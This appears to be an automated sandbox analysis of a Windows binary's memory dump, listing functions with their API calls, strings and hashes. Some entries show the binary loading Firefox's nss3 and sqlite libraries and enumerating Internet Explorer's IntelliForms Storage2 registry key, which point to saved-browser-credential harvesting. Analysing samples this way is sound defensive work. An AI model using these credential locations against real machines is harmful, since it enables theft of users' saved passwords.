Instruction ID: 454bece2ea24cac32075296694d9d3cbfc4d611bf65854eebe1c10393ee0200f
Opcode Fuzzy Hash: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
Instruction Fuzzy Hash: 46F01D3329C746A0383D09680B06AFF1001E2127497B585D3A882E06D5C8FDCEF2F81F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A16C, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0040A182
memset.MSVCRT ref: 0040A1A6
GetMenuItemInfoW.USER32 ref: 0040A1E1
memset.MSVCRT ref: 0040A210
wcschr.MSVCRT ref: 0040A21C
wcscat.MSVCRT ref: 0040A277
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 0040A293

Strings

6, xrefs: 0040A1CC
0, xrefs: 0040A1C1

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
Instruction ID: 34000a492db7a65727c4d20bf870b817f1c48c155544aae5e12c30b4e9d7c158
Opcode Fuzzy Hash: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
Instruction Fuzzy Hash: 64318B72408340AFDB20DF91D845A9BB7E8FF84354F00497EF948A2291E37ADA14CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00403926, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
#17.COMCTL32(?,00000002,?,?,?,0040E305,00000000), ref: 00403979
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996

Strings

Error: Cannot load the common control classes., xrefs: 00403990
comctl32.dll, xrefs: 0040392E
InitCommonControlsEx, xrefs: 00403951
Error, xrefs: 0040398B

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
Instruction ID: dc7e95600dee0bf6daca19896d95929b9e7fb1f9fe7c184dfd563e32ea829a14
Opcode Fuzzy Hash: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
Instruction Fuzzy Hash: 8501D1B67502117BE3111FB49C89B6B7EACDB42F4BB100139B502F2280DBB8CF05869C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FABA, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,74E057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAC9
GetModuleHandleW.KERNEL32(sqlite3.dll,?,74E057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAD2
GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,74E057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FADB
FreeLibrary.KERNEL32(00000000,?,74E057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAEA
FreeLibrary.KERNEL32(00000000,?,74E057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF1
FreeLibrary.KERNEL32(00000000,?,74E057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF8

Strings

nss3.dll, xrefs: 0040FAC4
sqlite3.dll, xrefs: 0040FACB
mozsqlite3.dll, xrefs: 0040FAD4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHandleLibraryModule
String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
API String ID: 662261464-3550686275
Opcode ID: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
Instruction ID: c5d69885cf2e3d5474ff6b38c23ba8038bf1212ac087c8b68f6824d90ef94812
Opcode Fuzzy Hash: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
Instruction Fuzzy Hash: 1AE0D816B0132E669E2067F16C44D1B7E5CC892AE53150037A904A32408DEC5C0599F8

Uniqueness

Uniqueness Score: -1.00%

Function 00441FDC, Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00442017
memcpy.MSVCRT ref: 004420BB
memcpy.MSVCRT ref: 004420CD
memcpy.MSVCRT ref: 004420F5
memcpy.MSVCRT ref: 00442107
memcpy.MSVCRT ref: 00442119
memcpy.MSVCRT ref: 00442168
memset.MSVCRT ref: 004421B6

Strings

G"D, xrefs: 00442009, 004421D0, 0044203F, 00442089, 00442011
G"D, xrefs: 00442164, 00442170, 00442167, 00442173

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memchrmemset
String ID: G"D$G"D
API String ID: 1581201632-2001841848
Opcode ID: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
Instruction ID: 18be241936230d761fb3e4c1ab226db0ef0f42d77396bda2a3194a4a2a5a8e65
Opcode Fuzzy Hash: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
Instruction Fuzzy Hash: CE51E671900219ABDB10EF65CD85EEEB7BCAF44304F44446BFA49D7141E778EA48CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00407890, Relevance: 15.1, APIs: 10, Instructions: 103COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004078A9
GetSystemMetrics.USER32 ref: 004078AF
GetDC.USER32(00000000), ref: 004078BC
GetDeviceCaps.GDI32(00000000,00000008), ref: 004078CD
GetDeviceCaps.GDI32(00000000,0000000A), ref: 004078D4
ReleaseDC.USER32 ref: 004078DB
GetWindowRect.USER32 ref: 004078EE
GetParent.USER32(?), ref: 004078F3
GetWindowRect.USER32 ref: 00407910
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040796F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
Instruction ID: 40da1e460122d0dbc2375826a99d02d2520f98ce936ed6642694246a0da552c1
Opcode Fuzzy Hash: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
Instruction Fuzzy Hash: D3318176A00209AFDB04DFB8CC85AEEBBB9FB48351F150175E901F3290DA70AE418B50

Uniqueness

Uniqueness Score: -1.00%

Function 0040684F, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406878
memset.MSVCRT ref: 0040688C
strcpy.MSVCRT(?), ref: 004068A6
strcpy.MSVCRT(?,?,?,?,?,?), ref: 004068EB
strcpy.MSVCRT(?,00001000,?,?,?,?,?,?), ref: 004068FF
strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?), ref: 00406912
wcscpy.MSVCRT ref: 00406921
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 00406948
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 0040695E

Strings

Rp@, xrefs: 0040684F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: strcpy$ByteCharMultiWidememset$wcscpy
String ID: Rp@
API String ID: 4248099071-3382320042
Opcode ID: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
Instruction ID: 073529020724e05d4964247b7c64433db30515fb9166064be710f6d7ccb76f44
Opcode Fuzzy Hash: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
Instruction Fuzzy Hash: 653141B290011DBFDB20DA55CC84FEA77BCFF09358F0445AAB919E3141DA74AA588F68

Uniqueness

Uniqueness Score: -1.00%

Function 00402B99, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00402BA5
abs.MSVCRT ref: 00402C95
abs.MSVCRT ref: 00402CC5
log.MSVCRT ref: 00402D61
log.MSVCRT ref: 00402D72
free.MSVCRT(00000000), ref: 00402D8E
free.MSVCRT(?), ref: 00402DA0

Strings

, xrefs: 00402BCB

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$wcslen
String ID:
API String ID: 3592753638-3916222277
Opcode ID: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
Instruction ID: 27dbad6a18cb5119fe9557e6abee58e32c1211c22f38b2cca10356837960f856
Opcode Fuzzy Hash: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
Instruction Fuzzy Hash: DA615770C0811AEBEF189F95E6895AEB771FF04305F60847FE442B62E0DBB84981CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A818, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

LoadMenuW.USER32 ref: 0040A83F

Part of subcall function 0040A668: GetMenuItemCount.USER32 ref: 0040A67E
Part of subcall function 0040A668: memset.MSVCRT ref: 0040A69D
Part of subcall function 0040A668: GetMenuItemInfoW.USER32 ref: 0040A6D9
Part of subcall function 0040A668: wcschr.MSVCRT ref: 0040A6F1

DestroyMenu.USER32(00000000), ref: 0040A85D
CreateDialogParamW.USER32 ref: 0040A8AB
memset.MSVCRT ref: 0040A8C7
GetWindowTextW.USER32 ref: 0040A8DC
EnumChildWindows.USER32 ref: 0040A907
DestroyWindow.USER32(00000000), ref: 0040A90E

Part of subcall function 0040A497: _snwprintf.MSVCRT ref: 0040A4BC

Strings

caption, xrefs: 0040A8F3

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
String ID: caption
API String ID: 1928666178-4135340389
Opcode ID: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
Instruction ID: 1ee1ed61ad6e464c94b1b5c04ceaba47984998c4c5bccbb9cf540d7a9e91c68f
Opcode Fuzzy Hash: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
Instruction Fuzzy Hash: 4C21B472100314BBDB11AF50DC49BAF3B78FF45751F148436F905A5191D7788AA0CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00407CFE, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407D1F
_snwprintf.MSVCRT ref: 00407D52
wcslen.MSVCRT ref: 00407D5E
memcpy.MSVCRT ref: 00407D76
wcslen.MSVCRT ref: 00407D84
memcpy.MSVCRT ref: 00407D97

Strings

G@, xrefs: 00407D24, 00407D7B, 00407D9C
%s (%s), xrefs: 00407D47

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)$G@
API String ID: 3979103747-4021399728
Opcode ID: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
Instruction ID: 7020ae682d4dad294ec7254b180182bae2c538f47323e789ebcab58d633c0506
Opcode Fuzzy Hash: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
Instruction Fuzzy Hash: 58215E72900219BBDF21DF95CD4599BB7B8BF04358F40846AF948AB201EB74EA188BD4

Uniqueness

Uniqueness Score: -1.00%

Function 004070BF, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 004070E4
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE), ref: 00407102
wcslen.MSVCRT ref: 0040710F
wcscpy.MSVCRT ref: 0040711F
LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 00407129
wcscpy.MSVCRT ref: 00407139

Strings

netmsg.dll, xrefs: 004070DF
Unknown Error, xrefs: 00407131

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: Unknown Error$netmsg.dll
API String ID: 2767993716-572158859
Opcode ID: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
Instruction ID: 89f566b746906e4e3228774242dd749435861e54522ca67c51f24cfbd45377e0
Opcode Fuzzy Hash: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
Instruction Fuzzy Hash: 2301F231A08114BBEB145B61EC46E9FBB68EB05BA1F20007AF606F41D0DEB96F00969C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A97E, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00407548: GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C

wcscpy.MSVCRT ref: 0040A998
wcscpy.MSVCRT ref: 0040A9A8
GetPrivateProfileIntW.KERNEL32 ref: 0040A9B9

Part of subcall function 0040A51E: GetPrivateProfileStringW.KERNEL32 ref: 0040A53A

Strings

TranslatorURL, xrefs: 0040A9F1
TranslatorName, xrefs: 0040A9DD
charset, xrefs: 0040A9C7
rtl, xrefs: 0040A9B3
general, xrefs: 0040A99D

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
Instruction ID: f715108fd1d236bc9ad6a323193eaeb919362f53399fbb1b2bc2ef5a739791b1
Opcode Fuzzy Hash: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
Instruction Fuzzy Hash: 33F0CD22EC035536E61176221D07F3E25088BA1B66F95447FBD08BA2D3DE7C4A14869E

Uniqueness

Uniqueness Score: -1.00%

Function 0042CD7E, Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042CE42
memset.MSVCRT ref: 0042CE7D

Strings

too many attached databases - max %d, xrefs: 0042CDD7
out of memory, xrefs: 0042CFEC
database is already attached, xrefs: 0042CEA8
unable to open database: %s, xrefs: 0042CFD5
database %s is already in use, xrefs: 0042CE4F
attached databases must use the same text encoding as main database, xrefs: 0042CEF6
cannot ATTACH database within transaction, xrefs: 0042CDED

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpymemset
String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 1297977491-2001300268
Opcode ID: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
Instruction ID: 266062839a895961ad217d8ef2c4278de09ba8d71166d49c3bc68db0563119ae
Opcode Fuzzy Hash: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
Instruction Fuzzy Hash: BE91C171B00315AFDB20DF69D981B9EBBF1AF04308F64845FE8159B282D778EA41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFDA, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06

??2@YAPAXI@Z.MSVCRT ref: 0040B01A
??2@YAPAXI@Z.MSVCRT ref: 0040B036
memcpy.MSVCRT ref: 0040B05B
memcpy.MSVCRT ref: 0040B06F
??2@YAPAXI@Z.MSVCRT ref: 0040B0F2
??2@YAPAXI@Z.MSVCRT ref: 0040B0FC
??2@YAPAXI@Z.MSVCRT ref: 0040B134

Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D

Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2

Strings

d, xrefs: 0040B113
(, xrefs: 0040B0BC

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID: ($d
API String ID: 1140211610-1915259565
Opcode ID: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
Instruction ID: 8a5fa3be38e8e11f26e8e9502e5dff09d3bfeaf4ce2a81799fe883ad29a31388
Opcode Fuzzy Hash: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
Instruction Fuzzy Hash: 50517872601700AFE728DF2AC586A5AB7E4FF48358F10852EE55ACB791DB74E940CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004150B6, Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041510E
Sleep.KERNEL32(00000001), ref: 00415118
GetLastError.KERNEL32 ref: 0041512A
UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00415202

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastLockSleepUnlock
String ID:
API String ID: 3015003838-0
Opcode ID: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
Instruction ID: 880e68434f8ef122057b7821066ce039c6a6aeb50982fb6198a036ab3cbbf4dd
Opcode Fuzzy Hash: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
Instruction Fuzzy Hash: 7641F379504B42EFE3228F219C05BEBB7E0EFC0B15F20492FF59556240CBB9D9858E1A

Uniqueness

Uniqueness Score: -1.00%

Function 00415D4D, Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415D77
GetFileAttributesW.KERNEL32(00000000), ref: 00415D7E
GetLastError.KERNEL32 ref: 00415D8B
Sleep.KERNEL32(00000064), ref: 00415DA0
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415DA9
GetFileAttributesA.KERNEL32(00000000), ref: 00415DB0
GetLastError.KERNEL32 ref: 00415DBD
Sleep.KERNEL32(00000064), ref: 00415DD2
free.MSVCRT(00000000), ref: 00415DDB

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$AttributesDeleteErrorLastSleep$free
String ID:
API String ID: 2802642348-0
Opcode ID: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
Instruction ID: 389b81331b8195f66de6fade72418799adbb9e1ccdce19076b3e4dce97b88e29
Opcode Fuzzy Hash: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
Instruction Fuzzy Hash: 13118A39500E10DBC6203B747C8D6FF36249BD7B37B21832BF963952D1DA5948C2566A

Uniqueness

Uniqueness Score: -1.00%

Function 004124C0, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004124F7
memcpy.MSVCRT ref: 00412523
memcpy.MSVCRT ref: 0041253D

Strings

", xrefs: 004124F1
<, xrefs: 004124D4
<br>, xrefs: 00412537
>, xrefs: 004124E2
°, xrefs: 0041250E
&, xrefs: 0041251D

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
Instruction ID: 1d27d4cf7977f40543be0eb13b72094ec5c0409efe485552fd301264f6eb4def
Opcode Fuzzy Hash: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
Instruction Fuzzy Hash: 570145B6E54260F2FA3024058EE6FF30145CB62754FA40027F88AA02C0A1CD0EE3A29F

Uniqueness

Uniqueness Score: -1.00%

Function 00409657, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3

Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A

Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010

memset.MSVCRT ref: 004096C7
RegEnumValueW.ADVAPI32 ref: 004096F5
_wcsupr.MSVCRT ref: 0040970F

Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D

memset.MSVCRT ref: 0040975E
RegEnumValueW.ADVAPI32 ref: 00409789
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 00409796

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00409674

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 4131475296-680441574
Opcode ID: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
Instruction ID: ced938f56f23152dc4036b8c9c372f29a7907612beabbfd18841790b2154e098
Opcode Fuzzy Hash: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
Instruction Fuzzy Hash: F84118B6D4011DABCB10EF99DD85AEFB7BCAF18304F1040AAB504F2191D7749B458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409FF5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
wcscpy.MSVCRT ref: 0040A076

Part of subcall function 0040A4E7: memset.MSVCRT ref: 0040A4FA
Part of subcall function 0040A4E7: _itow.MSVCRT ref: 0040A508

wcslen.MSVCRT ref: 0040A094
GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
memcpy.MSVCRT ref: 0040A10D

Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409F8D
Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FAB
Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FC9
Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FE7

Strings

strings, xrefs: 0040A06C

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
Instruction ID: f88dad89c8a087f2027bd78e20ebd55682c2f8a720c3c381d0e8595ecd4ac891
Opcode Fuzzy Hash: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
Instruction Fuzzy Hash: 84419A792003059BD7149F18EC91F323365F76430AB99053AE802A73B2DB79EC22CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A759, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A77E
GetDlgCtrlID.USER32 ref: 0040A789
GetWindowTextW.USER32 ref: 0040A7A0
memset.MSVCRT ref: 0040A7C7
GetClassNameW.USER32 ref: 0040A7DE
_wcsicmp.MSVCRT ref: 0040A7F0

Part of subcall function 0040A62F: memset.MSVCRT ref: 0040A642
Part of subcall function 0040A62F: _itow.MSVCRT ref: 0040A650

Strings

sysdatetimepick32, xrefs: 0040A7EA

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
Instruction ID: 9d6a1000cc6d846fb7caa7b95204278ebeb8f13d5a9664e287c5e204bace7976
Opcode Fuzzy Hash: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
Instruction Fuzzy Hash: E21177325002197AEB24EB91DD4AE9F77BCEF04750F4040B6F508E1192E7745A51CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00419008, Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00419140
memcpy.MSVCRT ref: 00419152
memcpy.MSVCRT ref: 0041916A
memcpy.MSVCRT ref: 00419187
memcpy.MSVCRT ref: 0041919F
memset.MSVCRT ref: 0041926C

Strings

-journal, xrefs: 00419164
-wal, xrefs: 00419199

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID: -journal$-wal
API String ID: 438689982-2894717839
Opcode ID: 6fed7457d1a2fea2dc9583d08aaaf374c1541fb4d673d97ffdcc6dd36cfdb3d3
Instruction ID: 551b55634523189e5c53bd135c739114fe40c1c2f7e89174430398bb56853e76
Opcode Fuzzy Hash: 6fed7457d1a2fea2dc9583d08aaaf374c1541fb4d673d97ffdcc6dd36cfdb3d3
Instruction Fuzzy Hash: 54A1DEB1A00606BFDB14CFA4C8517DEBBB0BF04314F14856EE468D7381D778AA95CB99

Uniqueness

Uniqueness Score: -1.00%

